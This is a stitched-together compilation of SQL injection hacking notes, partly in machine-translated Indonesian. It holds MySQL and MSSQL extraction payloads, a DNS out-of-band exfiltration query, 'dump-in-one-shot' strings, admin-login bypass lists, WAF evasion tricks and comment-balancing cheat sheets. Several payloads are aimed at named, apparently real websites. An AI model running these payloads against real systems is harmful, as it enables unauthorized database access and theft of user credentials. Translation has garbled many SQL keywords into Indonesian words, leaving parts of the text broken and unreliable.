2529#As said two lines above, the use of parenthesis can be used as a sep
2530SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
2531Auto-Casting to Right Collation:
2532SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
2533DNS Requests (OOB (Out-Of-Band)):
2534#For more information check this.
2535SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_a
2536Command Execution:
2537#If you're on a MySQL 4.X server, it's possible to execute OS comman
2538#It can be done if you're able to upload a shared object into /usr/
2539#The file extension is .so, and it must contain an "User Defined Fun
2540#Get raptor_udf.c, it's the source-code for just that feature.
2541#Remember to compile it for the right CPU Architecture.
2542#The CPU architecture can be resolved by this query:
2543SELECT @@version_machine;
2544<blockquote>A couple of useful blind queries to fingerprint the data
2545All of these return either True or False, as in, you either get a res
2546SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
2547SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
2548Running as root:
2549SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
2550Got File_priv:
2551SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
2552(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
2553(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
2554(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
2555LIMIT 0,1)=CHAR(89),1,0)=1
2556Got Super_priv (Are we DBA):
2557SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
2558(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
2559(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
2560(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
2561LIMIT 0,1)=CHAR(89),1,0)=1
2562Can MySQL Sleep:
2563#This query will return True and should take above 1 second to execut
2564SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
2565Can MySQL Benchmark:
2566SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
2567Are we on *NIX:
2568SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
2569Are we on Windows:
2570SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
2571Do a certain column exist:
2572SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
2573Do a certain table exist:
2574SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
2575SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
2576Do a certain database exist:
2577SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
2578SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
2579SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
2580SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db
2581from:h.ackack(dot)net
2582
2583Credits to owner :*
2584thanks
2585
2586INJEKSI MSSQL MENGGUNAKAN KONVERSI
2587
2588Kita mendapat target dan mari kita periksa apakah itu Rentan untuk disuntikkan. Jadi kita akan Jalankan URL dengan Menambahkan Kutipan Tunggal "'" di Akhir Jika Parameter Target.
2589http://www.Vuln-Site.com/authorprofile.asp?id=46 '
2590Ini Memberi Kita Kesalahan
2591
2592KESALAHAN:
2593Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e14'
2594[Microsoft] [ODBC SQL Server Driver] [SQL Server] Tanda kutip uncomposed setelah string karakter ''.
2595/authorprofile.asp, baris 10
2596
2597Situs Target kami adalah Rentan. Seperti kita Suntik dengan Serangan Konversikan Jadi kita tidak perlu Pergi Untuk Menghitung Jumlah Kolom Total. Kami akan langsung mengeksekusi Perintah kami dengan Konversi.
2598Mari Periksa Versi.
2599http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, @@ version) -
2600Setelah Melaksanakan Permintaan Kami Mendapat Versi.
2601
2602Berikut ini adalah Versi: Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Hak cipta (c) Microsoft Corporation Web Edition (64-bit) pada Windows NT 6.1 <X64> (Build 7601: Paket Layanan 1 )
2603Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2604[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal saat mengkonversi nilai nvarchar 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Hak Cipta (c) Microsoft Corporation Web Edition (64 -bit) pada Windows NT 6.1 <X64> (Build 7601: Service Pack 1) 'ke tipe data int.
2605/authorprofile.asp, baris 10
2606
2607Sekarang, mari kita periksa nama database saat ini.
2608http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, db_name ()) -
2609Dan kami sudah mendapat nama database saat ini.
2610
2611Ini adalah Nama Database Saat Ini: museindia
2612Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2613[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'museindia' ke tipe data int.
2614/authorprofile.asp, baris 10
2615
2616Seperti yang telah kita dapatkan Versi dan nama Database. Sekarang, mari kita pindah ke Getting The Tables.
2617Ini adalah pertanyaan kami untuk mendapatkan tabel.
2618http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables)) - +
2619Setelah Melaksanakan Kueri, Kita Mendapat Nama Tabel Pertama.
2620
2621Nama tabel: tentang
2622Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2623[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'about' ke int tipe data.
2624/authorprofile.asp, baris 10
2625Untuk Mendapatkan Tabel Lain dari Database, kita akan menambahkan nama Tabel Sebelumnya Terlampir Dengan Kutipan Tunggal dengan Tanda Kecil.
2626Sebagai contoh:
2627dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('OUR_PREVIOUS_TABLE_NAME_1', 'OUR_PREVIOUS_TABLE_NAME_2'))) - +
2628Jadi Mari Periksa Tabel Lainnya dari Basis Data.
2629http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('about'))) - +
2630Dan Kami Punya Nama Meja Berikutnya.
2631
2632Nama Tabel Berikutnya: aucon
2633Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
2634[Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'aucon' ke tipe data int.
2635/authorprofile.asp, baris 10
2636Dengan cara ini kita akan Terus Mendapatkan tabel Lainnya sampai mendapatkan Tabel yang Diperlukan.
2637Di sini kita Mendapat nama Tabel: anggota
2638Sekarang mari Dapatkan nama Kolom dari Tabel ini.
2639http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'members')) - +
2640kami telah mendapat nama Kolom Pertama.
2641
2642Ini adalah First Column Name: memberid
2643Mari mencoba mendapatkan Kolom lainnya seperti yang kita lakukan untuk mendapatkan tabel lain dari database.
2644
2645http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'members' dan column_name tidak di ('memberid') )) - +
2646Jadi Setelah Mendapatkan nama Kolom Bagian Terakhir adalah Untuk Mengekstrak Data dari Kolom.
2647Ini akan menjadi Pertanyaan Akhir Kita!
2648http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, (pilih top 1 OUR_COLUMN_NAME _DI SINI dari OUR_TABLE_NAME_HERE)) - +
2649Kueri ini akan Mencetak Data dari Kolom di WebPage.
2650
2651-h
2652
2653Mem-bypass Login Panel dengan SQL Queries
2654
2655http://trentglobal.com/admin
2656
2657Kita dapat menggunakan Live HTTP Headers atau Hackbar untuk Post Parameters Injection jadi saya akan Menggunakan Hackbar Untuk Proses ini.
2658Sekarang Mari Sisipkan Beberapa Teks dalam kotak nama pengguna dan kata sandi. Setelah Memasukkan Teks Klik pada Tombol LOGIN. Kemudian Aktifkan Data Posting di Hackbar untuk Pelaksanaan Parameter Posting Kita.
2659
2660Sekarang Klik LOAD URL Button di Hackbar untuk mendapatkan Parameter POST dalam kotak POST DATA di Hackbar Addon. Di sana kami akan memberikan pertanyaan SQL Injection.
2661
2662Ini memberi kami Nama Pengguna dan Kata Sandi yang tidak valid tetapi Anda dapat Melihat Data Pos di Addon Peretasan.
2663Berikut adalah Parameter Posting Kami uname = harhar & pwd = 123456 & log_submit = Login
2664ayo tambahkan Single Quote setelah uname = harhar 'untuk memeriksa kerentanan SQLi. Dan kemudian Execute the Query.
2665
2666Ini Rawan terhadap SQL Injection. Selanjutnya kita akan mengeksekusi Query SQL Berbasis STRING untuk Penyuntikan Lebih Lanjut.
2667Sekarang Mari Hitung berapa Banyak Kolom yang ada.
2668Jadi Kami akan Berikan Perintah Kami Untuk menghitung Kolom di Parameter Pasca dengan Hackbar.
2669order uname = harharharhar sebesar 2% 23
2670No Error !!
2671
2672uname = 'pesanan sebesar 3% 23
2673No Error !!
2674
2675order uname = harhar 'sebesar 4% 23
2676No Error !!
2677
2678uname = 'pesanan sebesar 5% 23
2679
2680Kami Punya Kesalahan !! Kolom tidak dikenal '5' di 'klausa pesanan'
2681Berarti Ada 4 Jumlah Kolom Total.
2682Hmmm Sekarang Mari Jalankan perintah UNION SELECT kami dengan 4 jumlah Kolom.
2683
2684BinGOOOO !! Panel Admin Dilewati. Kita sudah mendapat Akses ke Panel Admin Tanpa menggunakan Nama Pengguna atau Kata Sandi dari pengguna Admin.
2685
2686-h
2687Playing with DIOS #1
2688
2689task & rules
2690¤display version with your name
2691¤display count how many column names start with characters id_
2692¤display list of columns (with their database and table name) where column names start with characters id_
2693
2694Solution:
2695
2696http:p//vuln.net/produit.ph p?id=55 and 0 UNION%0aSELECT 1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a2050682e683472683472,0x3c42523e,0x6e756d626572206f6620636f6c756d6e73207374617274696e6720776974682069645f2069733a20,count(*),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and((column_name)like(0x69645f25))and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x2d2d3e,column_name))))x),0x3c7469746c653e),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23 from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f73 6368656d61)and(column_name)like(0x69645f25)--
2697
2698©MasterAjkaro
2699-h
2700
2701Playing with DIOS #2
2702
2703Task & rules
2704¤display version with your name
2705¤display total number of databases
2706¤display total number of tables (without those in information_schema)
2707¤display all table names (excluding those from information_schema) and columns count for each table
2708
2709solution......
2710
2711http://www.vuln.fr/pages /produit.php?id=55 and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x3a3a2050682e683472683472,0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20,(select count(*) %0Afrom information_schema.schemata),
27120x3c62723e746f74616c206e756d626572206f66207461626c657320696e206461746162617365732028776974686f757420696e666f726d6174696f6e5f736368656d61293a20,(select count(*) %0afrom information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61),
2713(select(@x)%0afrom(select(@x:=0x00),(select(0)%0afrom(information_schema.tables)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in
2714(@x:=concat(@x,0x3c62723e,0x7461626c653a20,@tbl:=table_name,
27150x202d2d3e20636f6c756d6e733a20,(select(count(*))%0Afrom(information_schema.columns)where(table_name=@tbl))x)
2716),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- -
2717
2718©Master Akjkaro
2719~h
2720
2721Playing with DIOS #3
2722
2723Task & rules
2724¤display version with your name
2725¤display all tables in primary database with records count for each table
2726
2727solution....
2728
2729http://www.vuln.com /product.php?c=11) and 0 UNION SELECT 1,concat
2730(version(),0x50682e683472683472,(select (@x) from (select (@x:=0x00),(select(0)from(information_schema.tables)where(table_schema=database()) and (0x00) in
2731(@x:=concat(@x,0x3c62723e,@tbl:=table_name,0x202d2d3e207265636f72647320696e207461626c653a20,(select table_rows from information_schema.tables where table_schema=Database() and table_name=@tbl))x)),3,4,5,6,7,8
2732
2733©Master Ajkaro
2734-h
2735
2736MSSQL DIOS
2737
2738¤1¤
2739==========================
2740http://www.aiou.edu.pk/Programmes.asp?PID=74;begin declare @x varchar(8000),@y int,@z varchar(50),@a varchar(100) declare @myTbl table (name varchar(8000) not null)SET @y=1 SET @x='injected by Me :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl)select @a=@a %2b column_name%2b' : '
2741from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2bCHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%
27422b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)SET @y = @y%2b1 end select @x as output into diosku END--
2743
2744¤2¤
2745==========================
2746http://www.aiou.edu.pk/Programmes.asp?PID=74%20and%200%3D1%20UNION%20SELECT%2b1%2Coutput%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%20from%20diosku--
2747
2748¤3¤
2749==========================
2750http://www.aiou.edu.pk/Programmes.asp?PID=74;DROP TABLE diosku--
2751
2752==========================
2753©securityidiots
2754-rkx
2755
2756The Error Connection Was Reset
2757
2758Query :
2759
2760id=.1union-- a%0Aselect
2761id=1-.1union- a%0Aselect
2762id=1'e0union- a%0Aselect
2763id=\Nunion- a%0Aselect
2764id=1 *9e0union-- -%0aselect
2765
2766Please Like and Share our Page :*
2767
2768-h
2769
2770Hari ini saya akan menunjukkan kepada Anda cara mem-bypass Web Application Firewalls (WAF). Saya akan mendemonstrasikan dari Teknik-Teknik Dasar dan Paling Sederhana ke yang Paling Mahir!
2771
2772CATATAN: Jika Anda tidak tahu SQL Injection, baca ini dulu ...
2773
2774Apa itu WAF?
2775
2776WAF adalah singkatan dari Firewall Aplikasi Web. Hal ini banyak digunakan saat ini untuk mendeteksi dan mempertahankan Suntikan SQL!
2777
2778Mari kita mulai!
2779
2780Bagaimana cara mengetahui apakah Firewall Aplikasi Web?
2781
2782Ini sangat sederhana! Ketika Anda mencoba memasukkan perintah yang digunakan untuk SQL Injections (biasanya perintah "UNION SELECT"), Anda mendapatkan 403 Error (dan situs web mengatakan "Forbidden" atau "Tidak Dapat Diterima").
2783Contoh:
2784
2785http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
2786(Kami mendapatkan kesalahan 403!)
2787Metode Dasar / Sederhana:
2788
2789Pertama, tentu saja, kita perlu mengetahui Metode Dasar untuk mem-bypass WAF…
2790
27911) Komentar:
2792Anda dapat menggunakan komentar untuk mem-bypass WAF:
2793
2794http://www.site.com/index.php?page_id=-15 / *! UNION * / / *! SELECT * / 1,2,3,4….
2795(Metode Pertama yang Dapat Menembus WAF)
2796
2797Namun, sebagian besar WAF mengidentifikasi metode ini sehingga mereka masih menunjukkan "Forbidden" Error…
2798
27992) Ubah Kasus Huruf:
2800Anda juga dapat mengubah Kasus Perintah:
2801
2802http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
2803(Metode Dasar Lain untuk Menghindari WAF!)
2804
2805Namun, seperti sebelumnya, trik ini juga terdeteksi oleh kebanyakan WAF!
2806
28073) Gabungkan Metode sebelumnya:
2808Yang dapat Anda lakukan adalah menggabungkan dua metode sebelumnya:
2809
2810http://www.site.com/index.php?page_id=-15 / *! uNIOn * / / *! SelECt * / 1,2,3,4….
2811
2812Metode ini tidak dapat dideteksi oleh banyak Firewall Aplikasi Web!
28134) Kata Kunci yang Diganti:
2814Beberapa Firewall menghapus Pernyataan "UNION SELECT" ketika ditemukan di URL ... Kita dapat melakukan ini untuk mengeksploitasi fungsi ini:
2815
2816http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
2817(The "union" dan "select" akan dihapus, jadi hasil akhirnya adalah: "UNION SELECT")
2818
2819Metode ini tidak berfungsi di SEMUA Firewall, karena hanya sebagian dari mereka yang menghapus perintah "UNION" dan "SELECT" saat terdeteksi!
28205) Komentar Sejajar:
2821Beberapa firewall dilewati dengan Memasukkan Inline Komentar antara "Union" dan "Pilih" Perintah:
2822
2823http://www.site.com/index.php?page_id=-15% 55nION / ** /% 53ElecT 1,2,3,4…
2824(The% 55 sama dengan "U" dan% 53 sampai "S". Lihat lebih lanjut di Bagian Lanjutan ....)
2825
2826Saya percaya bahwa ini adalah metode paling dasar untuk WAF Bypassing! Mari kita lanjutkan dengan yang lebih maju ...
2827Metode Lanjutan:
2828
2829Sekarang Anda telah belajar tentang Basic WAF Bypassing, saya pikir itu baik untuk memahami Metode yang lebih maju!
2830
28311) Buffer Overflow / Firewall Crash:
2832Banyak Firewall dikembangkan dalam C / C ++ dan kita dapat Crash mereka menggunakan Buffer Overflow!
2833
2834http://www.site.com/index.php?page_id=-15+and+(select 1) = (Pilih 0xAA [.. (tambahkan sekitar 1000 "A") ..]) + / *! uNIOn * / + / *! SeLECt * / + 1,2,3,4….
2835
2836((Anda dapat menguji apakah WAF dapat dihancurkan dengan mengetik:
2837? page_id = null% 0A / ** // *! 50000% 55nIOn * // * yoyu * / all / ** /% 0A / *!% 53eLEct * /% 0A / * nnaa * / + 1,2,3 , 4….
2838
2839Jika Anda mendapatkan 500, Anda dapat memanfaatkannya menggunakan Metode Buffer Overflow! ))
2840
28412) Ganti Karakter dengan Nilai HEX mereka:
2842Kita dapat mengganti beberapa karakter dengan Nilai HEX (URL-Encoded) mereka.
2843Contoh:
2844
2845http://www.site.com/index.php?page_id=-15 / *! u% 6eion * / / *! se% 6cect * / 1,2,3,4….
2846(yang berarti "memilih serikat")
2847
2848Teks ke Hex Encoder (Pilih hasil “Hex Encoded for URLâ€!): Http://www.swingnote.com/tools/texttohex.php
2849
28503) Gunakan Variabel atau Perintah lain, bukan yang umum untuk SQLi:
2851Terlepas dari "UNION SELECT", perintah lain mungkin diblokir.
2852Perintah Umum Diblokir:
2853COMMAND | APA YANG HARUS DIGUNAKAN BUKAN
2854@@ versi | versi()
2855concat () | concat_ws () -> Perbedaan antara concat () dan concat_ws (): http://is.gd/VEeiDU
2856group_concat () | concat_ws ()
2857
2858Belajar MySQL Sangat membantu dalam masalah seperti itu!
2859
28604) Misc Exploitable Functions:
2861Banyak firewall mencoba menawarkan lebih banyak Perlindungan dengan menambahkan Fungsi Prototipe atau Aneh! (Yang, tentu saja, bisa kita manfaatkan!):
2862Contoh:
2863
2864Firewall ini di bawah menggantikan "*" (tanda bintang) dengan Whitespaces! Apa yang bisa kita lakukan adalah ini:
2865
2866http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
2867
2868(Jika Firewall menghapus "*", hasilnya akan menjadi: 15 + union + pilih ....)
2869Jadi, jika Anda menemukan fungsi konyol seperti itu, Anda dapat memanfaatkannya, dengan cara ini!
2870
2871[+] Selain contoh sebelumnya, beberapa jalan pintas lain mungkin:
2872
2873-15+ (uNioN) + (sElECt)….
2874
2875-15+ (uNioN + SeleCT) + ...
2876
2877-15+ (UnI) (oN) + (SeL) (ecT) +….
2878
2879-15 + union (pilih 1,2,3,4…)
2880
2881-h
2882
2883
2884Error Based IS Double Query
2885Error Based = Double Query (Error based 2x)
2886
2887Bagaimana Anda tahu Anda harus menggunakan Error
2888Berdasarkan / Double Query? (Penting!)
2889Ini adalah bagian terpenting dari peretasan web; itu
2890jenis injeksi untuk digunakan dalam situasi yang berbeda.
2891Anda dapat menggunakan Injeksi Informasi Berbasis Kesalahan / Ganda
2892dalam kesalahan berikut yang Anda dapatkan
2893Kode:
2894Sebuah. Pernyataan Pilih Terpilih
2895Memiliki Jumlah Kolom yang Berbeda.
2896b. Kolom Tidak Diketahui 1 atau tidak ada kolom di
2897semua (di halaman web dan sumber halaman)
2898c.Error # 1604
2899Sekarang perhatikan kesalahan-kesalahan itu. Anda akan membutuhkannya.
2900versi:
2901Pendekatan pertama adalah mengetahui versi dari
2902database
2903Untuk melakukan itu kami memasukkan permintaan ini setelah akhir
2904URL
2905www.ddaarchitects.co.uk/click.php?bannerID=%27and(select+min(0)+from+(select+1+a+union+se%C2%ADlect+2)b,(select+1+union + pilih + 2) c + grup + oleh + concat ((pilih + mid (concat (table_nam% C2% ADe, 0x3a, group_concat (column_name)), 1,110) dari + information_schema.columns + di mana + ta% C2% ADble_schema = database () + dan + table_name% 3E '% C2% ADappuser'), masukkan (0x0, a, a, now ()))) - +
2906
2907Kode:
2908www.exmple.com/show?id=4 atau 1 grup oleh concat_ws (0x3a, versi (), floor (rand (0) * 2)) memiliki min (0) atau 1--
2909DATABASE GETTING
2910Langkah kedua: Mendapatkan nama database
2911Untuk mendapatkan basis data, kami memasukkan kueri ini
2912Kode:
2913dan (pilih 1 dari (pilih hitungan
2914(*), concat ((pilih)
2915(cast (database () sebagai char), 0x7e))
2916dari information_schema.tables di mana
2917table_schema = database () limit
29180,1), lantai (rand (0) * 2)) x dari
2919grup information_schema.tables oleh
2920x) a)
2921Perhatikan fungsi batas dalam kueri
2922Sebuah situs web dapat memiliki lebih dari 2 dua basis data, jadi
2923tingkatkan batas hingga Anda menemukan semua nama basis data
2924Contoh: membatasi 0,1 atau membatasi 1,1 atau membatasi 2,1
2925
2926Langkah Ketiga: Mendapatkan NAMA TABEL
2927
2928Nama tabel adalah apa yang kita butuhkan sekarang
2929Berikut kueri yang dapat kami gunakan:
2930Kode:
2931dan (pilih 1 dari (pilih hitungan
2932(*), concat ((pilih)
2933(cor (table_name sebagai char), 0x7e))
2934dari information_schema.tables di mana
2935table_schema = database () limit
29360,1), lantai (rand (0) * 2)) x dari
2937grup information_schema.tables oleh
2938x) a)
2939Jangan juga melupakan fungsi LIMIT yang kami gunakan di sini
2940untuk mendapatkan nama tabel satu per satu
2941CATATAN:
2942Sekarang inilah bagian pentingnya:
2943Ketika Anda mencari tabel terus bertambah
2944batasi sampai Anda menemukan nama tabel yang berharga
2945Misalnya: LIMIT 0,1
2946LIMIT 1,1
2947BATAS 2,1
2948Terus tingkatkan jumlahnya sampai Anda menemukan meja
2949Anda ingin mengekstrak informasi dari
2950Berikut rumusnya: LIMIT N, 1 di mana N adalah a
2951bilangan bulat acak
2952
2953Langkah Keempat: Mendapatkan Kolom dari spesifik
2954NAMA TABEL
2955
2956Baiklah, sekarang Anda telah memilih meja Anda
2957ingin mengekstrak kolom dari, waktu untuk mengeksekusi
2958pertanyaan lain
2959Jadi inilah cara ekstraksi kueri kolom akan terlihat
2960seperti:
2961Kode:
2962dan (pilih 1 dari (pilih hitungan
2963(*), concat ((pilih)
2964(cast (column_name sebagai char), 0x7e))
2965dari information_schema.columns
2966di mana table_name = batas 0xTABLEHEX
29670,1), lantai (rand (0) * 2)) x dari
2968grup information_schema.tables oleh
2969x) a)
2970Perhatikan LIMIT 0,1 FUNCTION dan 0xTABLEHEX
2971Anda perlu mengonversi tabel spesifik Anda menjadi hex
2972dan tambahkan 0x di awal string sehingga
2973dapat dibaca ke situs web
2974Untuk mengonversi string menjadi heksadesimal: http: //
2975www.swingnote.com/tools/texttohex.php
2976CATATAN:
2977Anda perlu menaikkan batas sampai Anda menemukan
2978kolom berharga seperti userName dan
2979kata sandi.
2980
2981Langkah Kelima: Mengekstrak data dari Kolom
2982
2983Baiklah bagian ini mungkin yang terbaik di SQL
2984menyuntikkan situs.
2985Saatnya untuk mendapatkan info dari kolom yang kita miliki
2986Untuk melakukan itu, gunakan query ini
2987Kode:
2988dan (pilih 1 dari (pilih hitungan
2989(*), concat ((pilih)
2990(dilemparkan (concat
2991(COLUMN_NAME, 0x7e, COLUMN_NAME) sebagai
2992char), 0x7e)) dari
2993Batas Databasename.TABLENAME
29940,1), lantai (rand (0) * 2)) x dari
2995grup information_schema.tables oleh
2996x) a)
2997
2998Atau Anda dapat melakukan (@: = 1) atau @ grup + oleh + concat (versi
2999(), @: =! @) + memiliki + mnt (0)
3000
3001© LUNATIC
3002
3003~ h
3004
3005Comment Name
3006-- : MySQL Linux Style
3007--+ : MySQL Windows Style
3008# : Hash (URL encode while use)
3009--+- : SQL Comment
3010;%00 : Null Byte
3011` : Backtick
3012
3013Variable/Function Output
3014@@hostname : Current Hostname
3015@@tmpdir : Tept Directory
3016@@datadir : Data Directory
3017@@version : Version of DB
3018@@basedir : Base Directory
3019user() : Current User
3020database() : Current Database
3021version() : Version
3022schema() : current Database
3023UUID() : System UUID key
3024current_user() : Current User
3025current_user : Current User
3026system_user() : Current Sustem user
3027session_user() : Session user
3028@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
3029@@GLOBAL.have_ssl : Check if it have ssl or not
3030
3031integer based ::
3032
3033--
3034-- -
3035--+-
3036)--
3037)-- -
3038)--+-
3039))--
3040))-- -
3041))--+-
3042;%00
3043) ;%00
3044));%00
3045%23
3046%60
3047%90
3048and 1=1
3049and '1'='1
3050and (1)=(1
3051php?id=(1) -- -
3052
3053string based ::
3054
3055'--+-
3056')-- -
3057')--+-
3058'))-- -
3059'))--+-
3060';%00
3061');%00
3062'));%00
3063'%23
3064'%60
3065'%90
3066' and 1=1
3067' and '1'='1
3068' and (1)=(1
3069php?id=(1') -- -
3070
3071string based double quotes ::
3072
3073"-- -
3074"--+-
3075"%23
3076")-- -
3077")--+-
3078"))--+-
3079";%00
3080") ;%00
3081"));%00
3082"%60
3083"%90
3084" and 1=1
3085" and '1'='1
3086" and (1)=(1
3087php?id=(1") -- -
3088
3089©
3090~h
3091
3092ADMIN LOGIN BRUTE FORCE
3093
3094'or 1=1 limit 1 -- -+
3095'or''='
3096' or '1'='1
3097' or 'x'='x
3098' or 0=0 --
3099" or 0=0 --
3100or 0=0 --
3101' or 0=0 #
3102" or 0=0 #
3103or 0=0 #
3104' or 'x'='x
3105" or "x"="x
3106') or ('x'='x
3107' or 1=1--
3108" or 1=1--
3109or 1=1--
3110' or a=a--
3111" or "a"="a
3112') or ('a'='a
3113") or ("a"="a
3114hi" or "a"="a
3115hi" or 1=1 --
3116hi' or 1=1 --
3117'or'1=1'
3118==
3119and 1=1--
3120and 1=1
3121' or 'one'='one--
3122' or 'one'='one
3123' and 'one'='one
3124' and 'one'='one--
31251') and '1'='1--
3126admin' --
3127admin' #
3128admin'/*
3129or 1=1--
3130or 1=1#
3131or 1=1/*
3132) or '1'='1--
3133) or ('1'='1--
3134' or '1'='1
3135' or 'x'='x
3136' or 0=0 --
3137" or 0=0 --
3138or 0=0 --
3139' or 0=0 #
3140" or 0=0 #
3141or 0=0 #
3142' or 'x'='x
3143" or "x"="x
3144') or ('x'='x
3145' or 1=1--
3146" or 1=1--
3147or 1=1--
3148' or a=a--
3149" or "a"="a
3150') or ('a'='a
3151") or ("a"="a
3152hi" or "a"="a
3153hi" or 1=1 --
3154hi' or 1=1 --
3155'or'1=1'
3156
3157~h
3158
3159[~] information_schema.tables [~]
3160
3161/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
3162
3163/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
3164
3165/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
3166
3167/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
3168
3169/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
3170
3171/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
3172
3173~h
3174
3175Injeksi Berbasis Kesalahan
3176---------------------
3177Injeksi berbasis kesalahan dikerahkan pada database yang didukung oleh MS-SQL.
3178
3179Database: MY-SQL: PHP
3180MS-SQL: .asp atau .aspx
3181
3182Probelm dengan Injeksi Berbasis Kesalahan untuk Peretas
3183-----------------------------------------------
31841. Versi () dan database () tidak berfungsi !!
3185Solusi: @@ version
3186
31872. Anda tidak dapat memanggil semua tabel dari database yang diberikan melalui information_schema.
3188
31893. Anda tidak dapat mengekstrak kolom dari tabel target Anda dalam satu perjalanan.
3190
3191Mengapa dikenal sebagai Injeksi Berbasis Kesalahan
3192-----------------------------------------
3193Itu berarti Anda akan mendapatkan data dalam kesalahan.
3194
